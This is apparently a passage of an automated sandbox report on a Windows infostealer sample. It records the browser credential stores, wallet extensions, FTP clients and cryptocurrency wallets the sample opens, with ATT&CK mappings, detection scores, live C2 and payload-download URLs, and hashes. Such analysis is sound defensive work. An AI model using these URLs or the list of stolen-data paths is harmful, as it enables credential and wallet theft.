              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: number of queries: 1001
              Source: Yara match File source: Process Memory Space: BJQizQ6sqT.exe PID: 4140, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match File source: Process Memory Space: BJQizQ6sqT.exe PID: 4140, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
              | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 2 Process Injection | 34 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 751 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 2 Process Injection | LSASS Memory | 34 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 223 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |

              | Source | Detection | Scanner | Label | Link |
              |---|---|---|---|---|
              | BJQizQ6sqT.exe | 61% | ReversingLabs | Win32.Infostealer.Tinba | |
              | BJQizQ6sqT.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
              | BJQizQ6sqT.exe | 100% | Joe Sandbox ML | | |

              No Antivirus matches

              | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
              |---|---|---|---|---|---|
              | s3-w.us-east-1.amazonaws.com | 3.5.29.90 | true | false | | high |
              | bitbucket.org | 185.166.143.48 | true | false | | high |
              | cuddlyready.xyz | 172.67.150.173 | true | false | | high |
              | fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high |
              | bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high |

              | Name | Malicious | Antivirus Detection | Reputation |
              |---|---|---|---|
              | sendypaster.xyz | false | | high |
              | steppriflej.xyz | false | | high |
              | smash-boiling.cyou | false | | high |
              | https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe | false | | high |
              | supporse-comment.cyou | false | | high |
              | hosue-billowy.cyou | false | | high |
              | cuddlyready.xyz | false | | high |
              | ripe-blade.cyou | false | | high |
              | greywe-snotty.cyou | false | | high |
              | https://cuddlyready.xyz/api | true | | unknown |
              | pollution-raker.cyou | false | | high |

              Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                high
                                                                                                                                https://cuddlyready.xyz:443/apiBJQizQ6sqT.exe, BJQizQ6sqT.exe, 00000000.00000003.2264300318.000000000107A000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368644392.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540649668.0000000000FCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgBJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netBJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://cdn.cookielaw.org/BJQizQ6sqT.exe, 00000000.00000003.2469469366.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543396017.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3BJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://cuddlyready.xyz/pihBJQizQ6sqT.exe, 00000000.00000003.2368445147.0000000001073000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368602207.0000000001073000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://cuddlyready.xyz/apiz6d2aulIgapAATu2Q4g14DFmyGQ/HKqBJQizQ6sqT.exe, 00000000.00000003.2368237256.0000000001058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://remote-app-switcher.stg-east.frontend.public.atl-paas.netBJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://bbuseruploads.s3.amazonaws.com/BJQizQ6sqT.exe, 00000000.00000002.2543339826.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2469469366.00000000058D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaBJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
IP              Domain                        Country        ASN    ASN Name         Malicious
185.166.143.48  bitbucket.org                 Germany        16509  AMAZON-02US      false
3.5.29.90       s3-w.us-east-1.amazonaws.com  United States  14618  AMAZON-AESUS     false
172.67.150.173  cuddlyready.xyz               United States  13335  CLOUDFLARENETUS  false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579796
Start date and time: 2024-12-23 09:15:43 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BJQizQ6sqT.exe
renamed because original name is a hash value
Original Sample Name: daed40d82d8d43f2ad0be3fb944c99a3.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@3/3
EGA Information: Failed
HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 2
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.190.181.0, 20.223.35.26, 13.107.246.63, 20.12.23.50, 150.171.28.10, 20.190.177.149, 20.223.36.55
                                                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com
                                                                                                                                                          • Execution Graph export aborted for target BJQizQ6sqT.exe, PID 4140 because there are no executed function
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                          • VT rate limit hit for: BJQizQ6sqT.exe
Time      Type             Description
03:16:41  API Interceptor  31x Sleep call for process: BJQizQ6sqT.exe modified
03:17:16  API Interceptor  1x Sleep call for process: WerFault.exe modified
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          dnf5RWZv2v.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          crhRJnVd08.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          xWnpPJbKGK.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          1fgVMJOnF0.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          s3-w.us-east-1.amazonaws.comjSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.216.152.124
                                                                                                                                                          mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.136.89
                                                                                                                                                          LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 16.182.101.249
                                                                                                                                                          zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.67.100
                                                                                                                                                          Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.18.140
                                                                                                                                                          5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.203.57
                                                                                                                                                          TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 3.5.16.86
                                                                                                                                                          uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                          • 16.182.37.145
                                                                                                                                                          EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.216.41.233
                                                                                                                                                          https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                          • 52.217.128.241
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          AMAZON-AESUSqlo1CDVCSf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          6dPpCeWDig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          kFrGefsAK3.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          NT3kfq4eeE.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          DP3m5O6yk5.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          uuOuIXWp1W.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          4JpRlHS5uF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          ME3htMIepa.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          tnMyloge4h.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          L07oVVY21C.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          CLOUDFLARENETUSRef#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • 104.26.13.205
                                                                                                                                                          LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.66.86
                                                                                                                                                          BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 104.21.66.86
                                                                                                                                                          FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 104.21.32.96
                                                                                                                                                          mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.66.86
                                                                                                                                                          Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 172.67.157.254
                                                                                                                                                          nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.64.41.3
                                                                                                                                                          jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.66.86
                                                                                                                                                          HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.66.86
                                                                                                                                                          QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.32.96
                                                                                                                                                          AMAZON-02USjSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.216.152.124
                                                                                                                                                          mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.67.100
                                                                                                                                                          Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.18.140
                                                                                                                                                          armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 54.203.164.5
                                                                                                                                                          5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.203.57
                                                                                                                                                          TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e12ZsJ2iP8Q2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          LopCYSStr3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          VBHyEN96Pw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          613vKYuY2S.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          No context
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):65536
                                                                                                                                                          Entropy (8bit):1.0465936511846248
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:WRgFH8vkFYi9y6sehroI7Jf7QXIDcQvc6QcEVcw3cE/n+HbHg/8BRTf3Oy1oVazl:Yg6v7V600BU/gjudx1fzuiFTZ24IO8r
                                                                                                                                                          MD5:006DF890666C5AC31B4DFAC69807BF67
                                                                                                                                                          SHA1:15C5D5358B1DEE417521D893D400B2CF3503A257
                                                                                                                                                          SHA-256:65DDA0DE32AFDE46BD029B39EE02480649C5E7F4DEE596A40FC0C7B0EDD71669
                                                                                                                                                          SHA-512:9311269D4453A907C6E1D1290FD2C91A01D7A61818E370C68AC88AEB7E1B8FEE56FE289047AED615CF2ECE08F963CEB30B7B020FB3FDFF0DAA4FBA22FAC93D3B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:Version=1 EventType=APPCRASH EventTime=133794154307493114 ReportType=2 Consent=1 UploadTime=133794154318743087 ReportStatus=524384 ReportIdentifier=5fcd4c46-6266-4cb7-ac62-c4f6a3bd9f0c IntegratorReportIdentifier=9d206a9d-b07a-4473-8c42-69db2958fc4d Wow64Host=34404 Wow64Guest=332 NsAppName=BJQizQ6sqT.exe AppSessionGuid=0000102c-0001-0015-7ee2-58fc1255db01 TargetAppId=W:000617ba36f2b299e0b86f2b3e4c58b1984b0000ffff!000000a4b14b4e574ac6e5c1136b0ee9789c3cf26b61!BJQizQ6sqT.exe TargetApp
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 08:17:10 2024, 0x1205a4 type
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):285702
                                                                                                                                                          Entropy (8bit):1.4941912520065337
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:hTU/DJtBBA5aQYZrH53P+6eMwBE2VfKXCV2CEWEs+TU9lV4:m/DJd1ZrZWtEIpEWEFTeV4
                                                                                                                                                          MD5:982F5112D1BCFB6AA5F3552BC59A3D2D
                                                                                                                                                          SHA1:D8A7D75DDE5A934C447B8B73FC4D37D0DA8C28D8
                                                                                                                                                          SHA-256:4A2CB7695D19BFA2F69610C1A087563011D207A517BBAB590F1ABF4C5641C560
                                                                                                                                                          SHA-512:76AD5BAD94B154849CE6448212A7DB1302ACDE02831EEB350A6A28DB4AEAE09911E9670F603476F71661C69239F8792644390D0843354F89A80329318FC57842
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8380
                                                                                                                                                          Entropy (8bit):3.7086190239381964
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:R6l7wVeJ7C6dc6Y2DISUu1EgmfcCprE89b6GC2sfF/+m:R6lXJe6m6YlSUumgmfce6GCVfd
                                                                                                                                                          MD5:BCF8DD003D4E6279DF1DFA66B1479057
                                                                                                                                                          SHA1:5393AC567E8E0FB0E4BAFD86E708A7AF308737ED
                                                                                                                                                          SHA-256:3BDBC976A0ADDC14E2711B2D4339365B23FDFA19434A3CA08B0AF1B9CE6E21B6
                                                                                                                                                          SHA-512:158325DC96D6BE49FFB7DA9304D1332B0A407F258C2E1574F6C0E432323EB25E65471D0E28682338C5C0D8D0D13FD47DE25BFF6602ABFAE0B7953DEF4583CF59
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
